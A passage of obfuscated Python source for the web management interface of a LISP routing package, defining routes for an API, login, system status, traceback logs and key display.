IIIi1i1I = lispconfig . lisp_get_clause_for_api ( command )
return ( json . dumps ( IIIi1i1I ) )
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
def o00O ( ) :
IIIi1i1I = { }
IIIi1i1I [ "hostname" ] = socket . gethostname ( )
IIIi1i1I [ "system-uptime" ] = commands . getoutput ( "uptime" )
IIIi1i1I [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
IIIi1i1I [ "lisp-version" ] = lisp . lisp_version
if 69 - 69: oO0o % I1Ii111 - o0oOOo0O0Ooo + I1Ii111 - O0 % OoooooooOO
Iii111II = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
IIIi1i1I [ "traceback-log" ] = Iii111II
if 9 - 9: OoO0O00
i11 = lisp . lisp_myrlocs [ 0 ]
O0oo0OO0oOOOo = lisp . lisp_myrlocs [ 1 ]
i11 = "none" if ( i11 == None ) else i11 . print_address_no_iid ( )
O0oo0OO0oOOOo = "none" if ( O0oo0OO0oOOOo == None ) else O0oo0OO0oOOOo . print_address_no_iid ( )
IIIi1i1I [ "lisp-rlocs" ] = [ i11 , O0oo0OO0oOOOo ]
return ( json . dumps ( IIIi1i1I ) )
if 35 - 35: IiII % I1IiiI
if 70 - 70: iII111i * I1ii11iIi11i
if 46 - 46: ooOoO0o / OoO0O00
if 52 - 52: o0oOOo0O0Ooo - OoooooooOO + Ii1I + Ii1I - o0oOOo0O0Ooo / I1Ii111
if 44 - 44: ooOoO0o . i1IIi - I1ii11iIi11i . O0 - ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if 70 - 70: Ii1I / I11i . iII111i % Oo0Ooo
if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII - OoO0O00 * o0oOOo0O0Ooo
if 46 - 46: OOooOOo + OoOoOO00 . I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
def o0o00ooo0 ( data_structure , data ) :
iI1ii1Ii = [ "site-cache" , "map-cache" , "system" , "map-resolver" ,
"map-server" ]
if 92 - 92: OoOoOO00
if ( data_structure not in iI1ii1Ii ) : return ( json . dumps ( [ ] ) )
if 26 - 26: iII111i . I1Ii111
if 68 - 68: OoO0O00
if 35 - 35: OoO0O00 - iII111i / Oo0Ooo / OoOoOO00
if 24 - 24: ooOoO0o - ooOoO0o / II111iiii - I1ii11iIi11i
if ( data_structure == "system" ) : return ( o00O ( ) )
if 69 - 69: oO0o . I1Ii111 + Ii1I / Oo0Ooo - oO0o
if 63 - 63: OOooOOo % oO0o * oO0o * OoO0O00 / I1ii11iIi11i
if 74 - 74: II111iiii
if 75 - 75: o0oOOo0O0Ooo . ooOoO0o
if ( data != "" ) : data = json . dumps ( data )
Oo0O00Oo0o0 = lisp . lisp_api_ipc ( "lisp-core" , data_structure + "%" + data )
if 87 - 87: ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if ( data_structure in [ "map-cache" , "map-resolver" ] ) :
if ( lisp . lisp_is_running ( "lisp-rtr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-rtr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if ( data_structure == "map-server" ) :
if ( lisp . lisp_is_running ( "lisp-etr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-etr" )
else :
return ( json . dumps ( [ ] ) )
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if ( data_structure == "site-cache" ) :
if ( lisp . lisp_is_running ( "lisp-ms" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-ms" )
else :
return ( json . dumps ( [ ] ) )
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
lisp . lprint ( "Waiting for api get-data '{}', parmameters: '{}'" . format ( data_structure , data ) )
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
iIii , ooo0O , oOoO0o00OO0 , i1I1ii = lisp . lisp_receive ( Oo , True )
lisp . lisp_ipc_lock . release ( )
return ( i1I1ii )
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
@ bottle . route ( '/lisp/api' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "delete" )
def I1111IIi ( command = "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "not-auth" } ] } ]
if ( bottle . request . auth == None ) : return ( IIIi1i1I )
if 93 - 93: OoooooooOO / I1IiiI % i11iIiiIii + I1ii11iIi11i * OoO0O00
if 15 - 15: I11i . OoO0O00 / Oo0Ooo + I11i
if 78 - 78: O0 . oO0o . II111iiii % OOooOOo
if 49 - 49: Ii1I / OoO0O00 . II111iiii
if ( bottle . request . auth != None ) :
i1iIIi1 , ii11iIi1I = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( i1iIIi1 , ii11iIi1I ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 68 - 68: i11iIiiIii % I1ii11iIi11i + i11iIiiIii
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( IIIi1i1I ) )
if 31 - 31: II111iiii . I1IiiI
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( IIIi1i1I ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if ( command == "user-account" ) :
if ( lispconfig . lisp_is_user_superuser ( i1iIIi1 ) == False ) :
IIIi1i1I = [ { "user-account" : [ { "?" : "not-auth" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
II = bottle . request . body . readline ( )
if ( II == "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
IIIi1i1I = json . loads ( II )
if ( command != "" ) :
command = "lisp " + command
else :
command = IIIi1i1I [ 0 ] . keys ( ) [ 0 ]
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
lisp . lisp_ipc_lock . acquire ( )
if ( bottle . request . method == "DELETE" ) :
IIIi1i1I = lispconfig . lisp_remove_clause_for_api ( IIIi1i1I )
else :
IIIi1i1I = lispconfig . lisp_put_clause_for_api ( IIIi1i1I )
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
lisp . lisp_ipc_lock . release ( )
return ( json . dumps ( IIIi1i1I ) )
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
@ bottle . route ( '/lisp/show/api-doc' , method = "get" )
def oooO0 ( ) :
if ( os . path . exists ( "lispapi.py" ) ) : os . system ( "pydoc lispapi > lispapi.txt" )
if ( os . path . exists ( "lispapi.txt" ) == False ) :
return ( "lispapi.txt file not found" )
if 46 - 46: I1Ii111
return ( bottle . static_file ( "lispapi.txt" , root = "./" ) )
if 60 - 60: o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
@ bottle . route ( '/lisp/show/command-doc' , method = "get" )
def OoO0o ( ) :
return ( bottle . static_file ( "lisp.config.example" , root = "./" ,
mimetype = "text/plain" ) )
if 78 - 78: oO0o % O0 % Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
@ bottle . route ( '/lisp/show/lisp-xtr' , method = "get" )
def o0oOO000oO0oo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 77 - 77: Oo0Ooo - i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if ( os . path . exists ( "./show-ztr" ) ) :
Oo0O0oooo = open ( "./show-ztr" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
else :
Oo0O0oooo = open ( "./show-xtr" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
if 56 - 56: I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
OoO0OOOOo0O = ""
I111iI = I111iI . split ( "\n" )
for OooOO in I111iI :
if ( OooOO [ 0 : 4 ] == " " ) : OoO0OOOOo0O += lisp . lisp_space ( 4 )
if ( OooOO [ 0 : 2 ] == " " ) : OoO0OOOOo0O += lisp . lisp_space ( 2 )
OoO0OOOOo0O += OooOO + "<br>"
if 21 - 21: I11i / IiII % iIii1I11I1II1 * Oo0Ooo
OoO0OOOOo0O = lisp . convert_font ( OoO0OOOOo0O )
return ( lisp . lisp_print_sans ( OoO0OOOOo0O ) )
if 57 - 57: II111iiii + i1IIi
if 10 - 10: oO0o + i1IIi
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
@ bottle . route ( '/lisp/show/<xtr>/keys' , method = "get" )
def iiIiI1i1 ( xtr ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 69 - 69: ooOoO0o
I11iII = lispconfig . lisp_is_user_superuser ( None )
if 5 - 5: I1IiiI
if ( I11iII == False ) :
i1I1ii = "Permission denied"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 48 - 48: o0oOOo0O0Ooo - oO0o / OoooooooOO
if 100 - 100: I1IiiI / o0oOOo0O0Ooo % II111iiii % Oo0Ooo % OOooOOo
if ( xtr not in [ "itr" , "etr" , "rtr" ] ) :
i1I1ii = "Invalid URL"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
OOoOO0o0o0 = "show {}-keys" . format ( xtr )
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
@ bottle . route ( '/lisp/geo-map/<geo_prefix>' )
def IIo0Oo0oO0oOO00 ( geo_prefix ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 92 - 92: OoooooooOO * I1Ii111
if 100 - 100: I1Ii111 + I1Ii111 * IiII
geo_prefix = geo_prefix . split ( "-" )
geo_prefix = "-" . join ( geo_prefix [ 0 : - 1 ] ) + "/" + geo_prefix [ - 1 ]
I1i = lisp . lisp_geo ( "" )
I1i . parse_geo_string ( geo_prefix )
O00Oooo , i11I = I1i . dms_to_decimal ( )
o00Oo0oooooo = I1i . radius * 1000
if 76 - 76: I11i / OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
o0o = open ( "./lispers.net-geo.html" , "r" ) ; oo0 = o0o . read ( ) ; o0o . close ( )
oo0 = oo0 . replace ( "$LAT" , str ( O00Oooo ) )
oo0 = oo0 . replace ( "$LON" , str ( i11I ) )
oo0 = oo0 . replace ( "$RADIUS" , str ( o00Oo0oooooo ) )
return ( oo0 )
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
@ bottle . route ( '/lisp/login' , method = "get" )
def oOO00O ( ) :
return ( lispconfig . lisp_login_page ( ) )
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
@ bottle . route ( '/lisp/login' , method = "post" )
def i1 ( ) :
if ( lispconfig . lisp_validate_user ( ) ) :
return ( lispconfig . lisp_landing_page ( ) )
if 88 - 88: OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % iIii1I11I1II1 + Oo0Ooo
return ( oOO00O ( ) )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
@ bottle . route ( '/lisp' )
def II1i11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 50 - 50: OoooooooOO % I11i
return ( lispconfig . lisp_landing_page ( ) )
if 49 - 49: oO0o - i11iIiiIii . I1Ii111 * Ii1I % iII111i + i1IIi
if 71 - 71: o0oOOo0O0Ooo
if 38 - 38: oO0o % OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 53 - 53: i11iIiiIii * iII111i
if 68 - 68: iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / II111iiii % Oo0Ooo
if 38 - 38: ooOoO0o - OOooOOo / iII111i
if 66 - 66: O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / Ii1I + I1ii11iIi11i
@ bottle . route ( '/lisp/traceback' )
def ooo00Ooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
o0O0oo0OO0O = True
if 68 - 68: oO0o . I11i % OoooooooOO . I11i
if 64 - 64: iIii1I11I1II1 / I1IiiI . II111iiii + OoooooooOO . OoO0O00
if 56 - 56: Oo0Ooo . I1ii11iIi11i . I1IiiI
if 39 - 39: O0 + I1Ii111
if ( os . path . exists ( "./logs/lisp-traceback.log" ) ) :
i1I1ii = commands . getoutput ( "cat ./logs/lisp-traceback.log" )
if ( i1I1ii ) :
i1I1ii = i1I1ii . replace ( "----------" , "<b>----------</b>" )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
o0O0oo0OO0O = False
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
if 26 - 26: I1ii11iIi11i - OoooooooOO
if 11 - 11: I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if ( o0O0oo0OO0O ) :
i1I1ii = ""
IIiI1Ii = "egrep --with-filename Traceback ./logs/*.log"
O0O0O0Oo = commands . getoutput ( IIiI1Ii )
for OOOOoO00o0O in O0O0O0Oo :
if ( OOOOoO00o0O . find ( ":" ) == - 1 ) : continue
OooOO = OOOOoO00o0O . split ( ":" )
if ( OooOO [ 1 ] == "0" ) : continue
i1I1ii += "Found Tracebacks in log file {}<br>" . format ( OooOO [ 0 ] )
o0O0oo0OO0O = False
if 41 - 41: OOooOOo * Ii1I - IiII + o0oOOo0O0Ooo
i1I1ii = i1I1ii [ 0 : - 4 ]
if 64 - 64: Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if ( o0O0oo0OO0O ) :
i1I1ii = "No Tracebacks found - a stable system is a happy system"
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
i1I1ii = lisp . lisp_print_cour ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 95 - 95: I1IiiI
if 46 - 46: OoOoOO00 + OoO0O00
if 70 - 70: iII111i / iIii1I11I1II1
if 85 - 85: OoooooooOO % i1IIi * OoooooooOO / I1ii11iIi11i
if 96 - 96: OoooooooOO + oO0o
if 44 - 44: oO0o
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
@ bottle . route ( '/lisp/show/not-supported' )
def oOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 64 - 64: I1ii11iIi11i - iII111i + iII111i - I11i
return ( lispconfig . lisp_not_supported ( ) )
if 30 - 30: iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
@ bottle . route ( '/lisp/show/status' )
def IIii11I1i1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 99 - 99: iII111i
if 76 - 76: OoO0O00 * I1IiiI
if 82 - 82: Ii1I * iII111i / I1ii11iIi11i
if 36 - 36: OoooooooOO - i1IIi . O0 / II111iiii + o0oOOo0O0Ooo
if 33 - 33: II111iiii / ooOoO0o * O0 % Ii1I * I1Ii111
i1I1ii = ""
I11iII = lispconfig . lisp_is_user_superuser ( None )
if ( I11iII ) :
O0o = lisp . lisp_button ( "show configuration" , "/lisp/show/conf" )
O0OOoOOO0oO = lisp . lisp_button ( "show configuration diff" , "/lisp/show/diff" )
I1ii11 = lisp . lisp_button ( "archive configuration" , "/lisp/archive/conf" )
oOoOoOoo0 = lisp . lisp_button ( "clear configuration" , "/lisp/clear/conf/verify" )
OOOOoO00o0O = lisp . lisp_button ( "log flows" , "/lisp/log/flows" )
III1ii1I = lisp . lisp_button ( "install LISP software" , "/lisp/install/image" )
Ii1i1iI = lisp . lisp_button ( "restart LISP subsystem" , "/lisp/restart/verify" )
if 16 - 16: OOooOOo / Oo0Ooo / OoooooooOO * I1IiiI + i1IIi % OOooOOo
i1I1ii = "<center>{}{}{}{}{}{}{}</center><hr>" . format ( O0o , O0OOoOOO0oO , I1ii11 , oOoOoOoo0 ,
OOOOoO00o0O , III1ii1I , Ii1i1iI )
if 71 - 71: OoOoOO00
if 14 - 14: i11iIiiIii % OOooOOo
OooO0oo = commands . getoutput ( "uptime" )
o0o0oOoOO0O = commands . getoutput ( "uname -pv" )
i1ii1II1ii = lisp . lisp_version . replace ( "+" , "" )
if 28 - 28: I1ii11iIi11i
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
if 60 - 60: ooOoO0o * iIii1I11I1II1 * I1ii11iIi11i * Oo0Ooo
O0ooooo0OOOO0 = multiprocessing . cpu_count ( )
if 9 - 9: II111iiii - o0oOOo0O0Ooo / iII111i / o0oOOo0O0Ooo
I1i111iiIIIi = OooO0oo . find ( ", load" )
OooO0oo = OooO0oo [ 0 : I1i111iiIIIi ]
O00 = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
iIiIIIIIii = "Not available"
if 58 - 58: o0oOOo0O0Ooo / IiII . OoOoOO00 / OoooooooOO + I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
OOoOO0o0o0 = "ps auww" if lisp . lisp_is_macos ( ) else "ps aux"
IIiiI = commands . getoutput ( "{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep" . format ( OOoOO0o0o0 ) )
if 31 - 31: I1ii11iIi11i + Ii1I + I1Ii111 / Ii1I
if 25 - 25: OoO0O00
IIiiI = IIiiI . replace ( " " , lisp . space ( 1 ) )
IIiiI = IIiiI . replace ( "\n" , "<br>" )
if 24 - 24: IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o0o0oOoOO0O . find ( "Darwin" ) != - 1 ) :
O0ooooo0OOOO0 = O0ooooo0OOOO0 / 2
iIiIIIIIii = commands . getoutput ( "top -l 1 | head -50" )
iIiIIIIIii = iIiIIIIIii . split ( "PID" )
iIiIIIIIii = iIiIIIIIii [ 0 ]
if 74 - 74: O0 / i1IIi
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
I1i111iiIIIi = iIiIIIIIii . find ( "Load Avg" )
II1i = iIiIIIIIii [ 0 : I1i111iiIIIi ] . find ( "threads" )
Ii1IIIIi1ii1I = iIiIIIIIii [ 0 : II1i + 7 ]
iIiIIIIIii = Ii1IIIIi1ii1I + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "CPU usage" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "SharedLibs:" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "MemRegions" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "PhysMem" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "VM:" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "Networks" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "Disks" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
else :
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
I111iI = commands . getoutput ( "top -b -n 1 | head -50" )
I111iI = I111iI . split ( "PID" )
I111iI [ 1 ] = I111iI [ 1 ] . replace ( " " , lisp . space ( 1 ) )
I111iI = I111iI [ 0 ] + I111iI [ 1 ]
iIiIIIIIii = I111iI . replace ( "\n" , "<br>" )
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
O00oOo00o0o = commands . getoutput ( "cat release-notes.txt" )
O00oOo00o0o = O00oOo00o0o . replace ( "\n" , "<br>" )
if 85 - 85: iII111i + OoooooooOO * iII111i - I1Ii111 % i11iIiiIii
i1I1ii += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
''' . format ( i1ii1II1ii , lisp . lisp_version , Oo0o , O00 ,
